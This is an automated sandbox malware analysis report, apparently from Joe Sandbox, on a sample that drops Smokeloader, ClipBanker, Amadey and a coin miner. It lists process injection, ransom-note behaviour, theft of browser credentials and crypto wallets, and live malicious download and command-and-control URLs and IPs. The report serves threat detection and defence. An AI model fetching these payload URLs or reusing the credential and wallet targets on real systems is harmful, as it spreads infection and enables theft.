                Source: Yara matchFile source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.612344653.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.520904242.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.520904242.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED
                Source: Yara matchFile source: Process Memory Space: aafg31.exe PID: 2336, type: MEMORYSTR
                Source: Yara matchFile source: 32.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.build2.exe.8415a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.build2.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 4696, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                Source: Yara matchFile source: 00000020.00000002.522623167.0000000002345000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aafg31.exe PID: 2336, type: MEMORYSTR
                Source: Yara matchFile source: 32.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.build2.exe.8415a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.build2.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 4696, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                412
                Process Injection
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium14
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization2
                Data Encrypted for Impact
                Default Accounts1
                Native API
                11
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                3
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                1
                Services File Permissions Weakness
                11
                Registry Run Keys / Startup Folder
                31
                Obfuscated Files or Information
                1
                Credentials in Registry
                45
                System Information Discovery
                SMB/Windows Admin Shares1
                Input Capture
                Automated Exfiltration11
                Non-Standard Port
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts2
                Command and Scripting Interpreter
                Logon Script (Mac)1
                Services File Permissions Weakness
                22
                Software Packing
                NTDS1
                Query Registry
                Distributed Component Object ModelInput CaptureScheduled Transfer5
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud Accounts1
                Scheduled Task/Job
                Network Logon ScriptNetwork Logon Script1
                File Deletion
                LSA Secrets441
                Security Software Discovery
                SSHKeyloggingData Transfer Size Limits126
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common11
                Masquerading
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion
                DCSync13
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job412
                Process Injection
                Proc Filesystem1
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories
                /etc/passwd and /etc/shadow1
                Remote System Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Services File Permissions Weakness
                Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 876998 Sample: 01860199.exe Startdate: 28/05/2023 Architecture: WINDOWS Score: 100 124 zexeq.com 2->124 126 colisumy.com 2->126 128 2 other IPs or domains 2->128 188 Snort IDS alert for network traffic 2->188 190 Multi AV Scanner detection for domain / URL 2->190 192 Found malware configuration 2->192 194 20 other signatures 2->194 14 01860199.exe 2->14         started        17 hwgujdv 2->17         started        19 D804.exe 2->19         started        21 mstsca.exe 2->21         started        signatures3 process4 signatures5 228 Detected unpacking (changes PE section rights) 14->228 230 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 14->230 232 Maps a DLL or memory area into another process 14->232 23 explorer.exe 6 50 14->23 injected 28 D804.exe 14->28         started        234 Multi AV Scanner detection for dropped file 17->234 236 Checks if the current machine is a virtual machine (disk enumeration) 17->236 238 Creates a thread in another existing process (thread injection) 17->238 240 Detected unpacking (overwrites its own PE header) 19->240 242 Injects a PE file into a foreign processes 19->242 30 D804.exe 13 19->30         started        process6 dnsIp7 136 shsplatform.co.uk 80.66.203.53 UKFASTGB United Kingdom 23->136 138 speedlab.com.eg 217.174.148.28, 443, 49701, 49723 TELEPOINTBG Bulgaria 23->138 148 9 other IPs or domains 23->148 106 C:\Users\user\AppData\Roaming\hwgujdv, PE32 23->106 dropped 108 C:\Users\user\AppData\Roaming\ewgujdv, PE32 23->108 dropped 110 C:\Users\user\AppData\Local\Temp\F4F7.exe, PE32 23->110 dropped 112 20 other malicious files 23->112 dropped 198 System process connects to network (likely due to code injection or exploit) 23->198 200 Benign windows process drops PE files 23->200 202 Deletes itself after installation 23->202 204 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->204 32 D804.exe 23->32         started        35 3C54.exe 23->35         started        38 F4F7.exe 23->38         started        40 7 other processes 23->40 140 api.2ip.ua 28->140 142 211.59.14.90, 49714, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 30->142 144 zexeq.com 30->144 146 api.2ip.ua 30->146 file8 signatures9 process10 file11 160 Detected unpacking (changes PE section rights) 32->160 162 Detected unpacking (overwrites its own PE header) 32->162 164 Machine Learning detection for dropped file 32->164 166 Writes a notice file (html or txt) to demand a ransom 32->166 42 D804.exe 1 15 32->42         started        92 C:\Users\user\AppData\Local\Temp\aafg31.exe, PE32+ 35->92 dropped 94 C:\Users\user\AppData\Local\...\XandETC.exe, PE32+ 35->94 dropped 96 C:\Users\user\AppData\Local\...96ewPlayer.exe, PE32 35->96 dropped 168 Antivirus detection for dropped file 35->168 170 Multi AV Scanner detection for dropped file 35->170 46 NewPlayer.exe 35->46         started        49 aafg31.exe 35->49         started        51 XandETC.exe 35->51         started        172 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 38->172 174 Maps a DLL or memory area into another process 38->174 176 Checks if the current machine is a virtual machine (disk enumeration) 38->176 178 Creates a thread in another existing process (thread injection) 38->178 180 Injects a PE file into a foreign processes 40->180 53 B46F.exe 40->53         started        55 A170.exe 40->55         started        57 913F.exe 40->57         started        59 WerFault.exe 4 10 40->59         started        signatures12 process13 dnsIp14 150 api.2ip.ua 162.0.217.254, 443, 49702, 49707 ACPCA Canada 42->150 152 192.168.2.1 unknown unknown 42->152 114 C:\Users\user\AppData\Local\...\D804.exe, PE32 42->114 dropped 61 D804.exe 42->61         started        64 icacls.exe 42->64         started        116 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 46->116 dropped 244 Multi AV Scanner detection for dropped file 46->244 66 mnolyk.exe 46->66         started        154 jp.imgjeoighw.com 103.100.211.218, 49720, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong 49->154 156 ss.apjeoighw.com 154.221.31.191 HKKFGL-AS-APHKKwaifongGroupLimitedHK Seychelles 49->156 158 6 other IPs or domains 49->158 file15 signatures16 process17 file18 218 Injects a PE file into a foreign processes 61->218 69 D804.exe 61->69         started        88 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 66->88 dropped 90 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 66->90 dropped 220 Antivirus detection for dropped file 66->220 222 Multi AV Scanner detection for dropped file 66->222 224 Creates an undocumented autostart registry key 66->224 226 Machine Learning detection for dropped file 66->226 signatures19 process20 dnsIp21 130 zexeq.com 175.119.10.231, 49711, 49721, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 69->130 132 123.140.161.243, 49713, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 69->132 134 2 other IPs or domains 69->134 98 C:\Users\user\AppData\Local\...\build3[1].exe, PE32 69->98 dropped 100 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 69->100 dropped 102 C:\Users\user\AppData\Local\...\build3.exe, PE32 69->102 dropped 104 8 other malicious files 69->104 dropped 196 Modifies existing user documents (likely ransomware behavior) 69->196 74 build2.exe 69->74         started        77 build3.exe 69->77         started        file22 signatures23 process24 file25 206 Multi AV Scanner detection for dropped file 74->206 208 Detected unpacking (changes PE section rights) 74->208 210 Detected unpacking (overwrites its own PE header) 74->210 212 Machine Learning detection for dropped file 74->212 80 build2.exe 74->80         started        118 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 77->118 dropped 214 Antivirus detection for dropped file 77->214 216 Uses schtasks.exe or at.exe to add and modify task schedules 77->216 84 schtasks.exe 77->84         started        signatures26 process27 dnsIp28 120 t.me 149.154.167.99 TELEGRAMRU United Kingdom 80->120 122 188.34.154.187 HETZNER-ASDE Germany 80->122 182 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 80->182 184 Tries to harvest and steal browser information (history, passwords, etc) 80->184 186 Tries to steal Crypto Currency Wallets 80->186 86 conhost.exe 84->86         started        signatures29 process30

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                01860199.exe38%ReversingLabs
                01860199.exe38%VirustotalBrowse
                01860199.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll100%AviraHEUR/AGEN.1301090
                C:\Users\user\AppData\Local\Temp\9F31.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\Temp\5DA0.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\Temp\6FA9.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\Temp\3C54.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe100%AviraHEUR/AGEN.1319380
                C:\Users\user\AppData\Local\Temp\D804.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\57DC.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\9F31.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\B46F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\5DA0.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\A3D5.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\BC2.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\D689.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\EA44.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\388B.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\CBE6.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\C861.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\673.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\A170.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\3E02.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6FA9.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\B8C8.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\F4F7.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\3C54.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\913F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe87%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe87%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll83%ReversingLabsWin64.Trojan.Amadey
                C:\Users\user\AppData\Local\Temp\3C54.exe70%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\57DC.exe43%ReversingLabs
                C:\Users\user\AppData\Local\Temp\5DA0.exe70%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\6FA9.exe70%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe88%ReversingLabsWin32.Trojan.Privateloader
                C:\Users\user\AppData\Local\Temp\913F.exe71%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\9F31.exe70%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\A170.exe71%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\A3D5.exe71%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\B8C8.exe71%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\D689.exe71%ReversingLabsWin32.Trojan.Smokeloader
                C:\Users\user\AppData\Local\Temp\NewPlayer.exe88%ReversingLabsWin32.Trojan.Privateloader
                C:\Users\user\AppData\Local\Temp\XandETC.exe73%ReversingLabsWin64.Coinminer.Xmrig
                C:\Users\user\AppData\Local\Temp\aafg31.exe33%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll83%ReversingLabsWin64.Trojan.Amadey
                C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Roaming\hwgujdv38%ReversingLabs
                No Antivirus matches
                SourceDetectionScannerLabelLink
                toobussy.com3%VirustotalBrowse
                colisumy.com24%VirustotalBrowse
                potunulit.org22%VirustotalBrowse
                jp.imgjeoighw.com19%VirustotalBrowse
                speedlab.com.eg1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://potunulit.org/0%URL Reputationsafe
                http://jp.imgjeoighw.com/sts/image.jpg0%URL Reputationsafe
                http://ss.apjeoighw.com/0%URL Reputationsafe
                http://zexeq.com/raud/get.php100%URL Reputationmalware
                http://kingpirate.ru/tmp/0%URL Reputationsafe
                http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
                http://45.9.74.80/power.exe100%URL Reputationmalware
                http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
                http://ss.apjeoighw.com/check/safe0%URL Reputationsafe
                http://colisumy.com/dl/build2.exe100%URL Reputationmalware
                https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll0%URL Reputationsafe
                http://www.wikipedia.com/0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exe0%URL Reputationsafe
                http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58100%Avira URL Cloudmalware
                https://we.tl/t-tnzomMj60%Avira URL Cloudsafe
                http://ss.apjeoighw.com/check/safe30%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exel100%Avira URL Cloudmalware
                http://colisumy.com/dl/build2.exe$run100%Avira URL Cloudmalware
                45.9.74.80/0bjdn2Z/index.php100%Avira URL Cloudmalware
                http://colisumy.com/dl/build2.exerun3100%Avira URL Cloudmalware
                https://shsplatform.co.uk/tmp/index.php100%Avira URL Cloudmalware
                http://45.9.74.80/0bjdn2Z/Plugins/clip64.dll100%Avira URL Cloudmalware
                http://188.34.154.187:30303/addon.zip0%Avira URL Cloudsafe
                http://45.9.74.80/0bjdn2Z/Plugins/cred64.dll100%Avira URL Cloudmalware
                http://ss.apjeoighw.com/check/safe)0%Avira URL Cloudsafe
                http://194.180.48.90/cc.exe0%Avira URL Cloudsafe
                http://ss.apjeoighw.com:80/check/safe0%Avira URL Cloudsafe
                https://speedlab.com.eg/tmp/index.php0%Avira URL Cloudsafe
                http://ss.apjeoighw.com/check/safe1B0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exe$runZT100%Avira URL Cloudmalware
                http://toobussy.com/0%Avira URL Cloudsafe
                http://jp.imgjeoighw.com/sts/image.jpgO100%Avira URL Cloudmalware
                http://ss.apjeoighw.com/check/?sid=436160&key=a96ab7e5e6412d32675599dfaebc13f60%Avira URL Cloudsafe
                http://zexeq.com/raud/get.phpep100%Avira URL Cloudmalware
                http://wuc11.com/tmp/0%Avira URL Cloudsafe
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                http://ss.apjeoighw.com/blob:0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C100%Avira URL Cloudmalware
                http://188.34.154.187:30303/0%Avira URL Cloudsafe
                http://ss.apjeoighw.com/check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc70%Avira URL Cloudsafe
                http://45.9.74.80/0bjdn2Z/index.php100%Avira URL Cloudmalware
                http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%100%Avira URL Cloudmalware
                http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true100%Avira URL Cloudmalware
                http://colisumy.com/dl/build.exe100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0100%Avira URL Cloudmalware
                http://188.34.154.187:30303/e44c96dfdf315ccf17cdd4b93cfe6e480%Avira URL Cloudsafe
                http://ss.apjeoighw.com/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba520%Avira URL Cloudsafe
                http://toobussy.com/tmp/100%Avira URL Cloudmalware
                http://ss.apjeoighw.com:80/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52G_0%Avira URL Cloudsafe
                http://45.9.74.80/0bjdn2Z/index.php?scr=1100%Avira URL Cloudmalware
                http://ladogatur.ru/tmp/0%Avira URL Cloudsafe
                https://we.tl/t-tnzomMj6HU0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Cg100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exerunb10100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                toobussy.com
                222.236.49.123
                truetrueunknown
                star-mini.c10r.facebook.com
                157.240.9.35
                truefalse
                  high
                  star.c10r.facebook.com
                  157.240.17.17
                  truefalse
                    high
                    colisumy.com
                    211.119.84.112
                    truetrueunknown
                    potunulit.org
                    188.114.97.7
                    truetrueunknown
                    jp.imgjeoighw.com
                    103.100.211.218
                    truetrueunknown
                    speedlab.com.eg
                    217.174.148.28
                    truetrueunknown
                    t.me
                    149.154.167.99
                    truefalse
                      high
                      ss.apjeoighw.com
                      154.221.31.191
                      truefalse
                        unknown
                        api.2ip.ua
                        162.0.217.254
                        truefalse
                          high
                          shsplatform.co.uk
                          80.66.203.53
                          truetrue
                            unknown
                            zexeq.com
                            175.119.10.231
                            truetrue
                              unknown
                              www.facebook.com
                              unknown
                              unknownfalse
                                high
                                adsmanager.facebook.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://potunulit.org/true
                                  • URL Reputation: safe
                                  unknown
                                  https://shsplatform.co.uk/tmp/index.phptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://jp.imgjeoighw.com/sts/image.jpgtrue
                                  • URL Reputation: safe
                                  unknown
                                  http://45.9.74.80/0bjdn2Z/Plugins/cred64.dlltrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://zexeq.com/raud/get.phptrue
                                  • URL Reputation: malware
                                  unknown
                                  45.9.74.80/0bjdn2Z/index.phptrue
                                  • Avira URL Cloud: malware
                                  low
                                  https://steamcommunity.com/profiles/76561199508624021false
                                    high
                                    http://188.34.154.187:30303/addon.zipfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://45.9.74.80/0bjdn2Z/Plugins/clip64.dlltrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://kingpirate.ru/tmp/true
                                    • URL Reputation: safe
                                    unknown
                                    http://194.180.48.90/cc.exetrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://speedlab.com.eg/tmp/index.phptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://adsmanager.facebook.com/ads/manager/account_settings/account_billing/false
                                      high
                                      http://45.9.74.80/power.exetrue
                                      • URL Reputation: malware
                                      unknown
                                      https://t.me/looking_glassbotfalse
                                        high
                                        http://ss.apjeoighw.com/check/?sid=436160&key=a96ab7e5e6412d32675599dfaebc13f6false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://wuc11.com/tmp/true
                                        • Avira URL Cloud: safe
                                        unknown
